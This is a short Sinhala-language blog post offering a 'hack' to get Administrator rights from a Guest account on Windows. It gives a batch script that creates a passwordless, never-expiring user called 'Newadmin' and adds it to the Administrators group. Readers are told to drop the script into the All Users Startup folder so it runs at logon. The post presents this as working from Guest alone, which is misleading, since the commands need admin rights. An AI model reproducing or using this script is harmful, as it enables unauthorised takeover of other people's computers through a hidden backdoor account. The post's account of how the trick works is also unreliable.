Latest

10:38 AM Free CryptoCoin


Guest Account එකෙන් ලේසියෙන්ම Administrator Hack කරන්න පුළුවන්.ඔයාට අවශ්‍ය වෙන්නේ Guest Account එකක් විතරයි.එහෙනම් අපි පටන් ගමු.


මුලින්ම Note pad එක open කරන්න.ඊට පස්සේ පහල code එක Paste කරන්න.

@echo off
net user Newadmin /add /expires:never /passwordreq:no

net localgroup “Administrators” /add Newadmin

ඊටත් පස්සේ  මේක "bat "File එකක් විදියට Save කරන්න.
අන්තිමට ඔයා Save කරගත්තු File එක Startup folder  එකට දාගන්න.දන්නේ නැත්නම් මෙන්න path එක.
local:\Documents and Settings\All Users\Start Menu\Programs\Startup
හරි ලේසියි Try කරලම බලන්න.
අවවාදය :අතිශයින්ම හොඳ වැඩවලට පමණයි!



 
Top